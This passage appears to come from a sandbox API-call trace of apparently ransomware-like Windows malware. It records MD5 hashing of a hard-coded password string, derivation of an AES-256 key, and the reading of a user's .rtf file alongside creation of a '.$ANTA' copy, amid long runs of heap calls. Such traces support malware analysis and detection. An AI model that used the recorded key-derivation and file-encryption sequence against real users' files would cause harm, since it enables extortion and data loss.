lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.848] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0122.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.848] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0122.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.849] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.849] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca838, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.849] CryptHashData (hHash=0x41ac640, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0122.849] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.849] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.849] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca790, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.849] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac180) returned 1 [0122.849] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.849] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.849] CryptDestroyHash (hHash=0x41ac640) returned 1 [0122.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0122.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0122.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0122.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0122.850] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0122.850] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0122.850] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0122.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0122.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.851] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\f9lcZFridHfs.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\f9lczfridhfs.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0122.851] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.851] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0122.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0122.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0122.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0122.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.851] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0122.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0122.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0122.852] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0122.852] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0122.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0122.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392618 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0122.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0122.853] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0122.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0122.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0122.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0122.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0122.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.854] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\f9lcZFridHfs.rtf.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\f9lczfridhfs.rtf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0122.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0122.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0122.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0122.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.855] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0122.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0122.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0122.855] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0122.855] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0122.855] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0122.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0122.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e05020 [0122.858] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0122.858] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0xa86e, lpOverlapped=0x0) returned 1 [0122.861] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0122.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa86e) returned 0x49aa010 [0122.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0122.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0122.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa86e) returned 0x49b4888 [0122.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.865] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0122.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa86e) returned 0x49aa010 [0122.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0122.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.866] PeekMessageW (in: 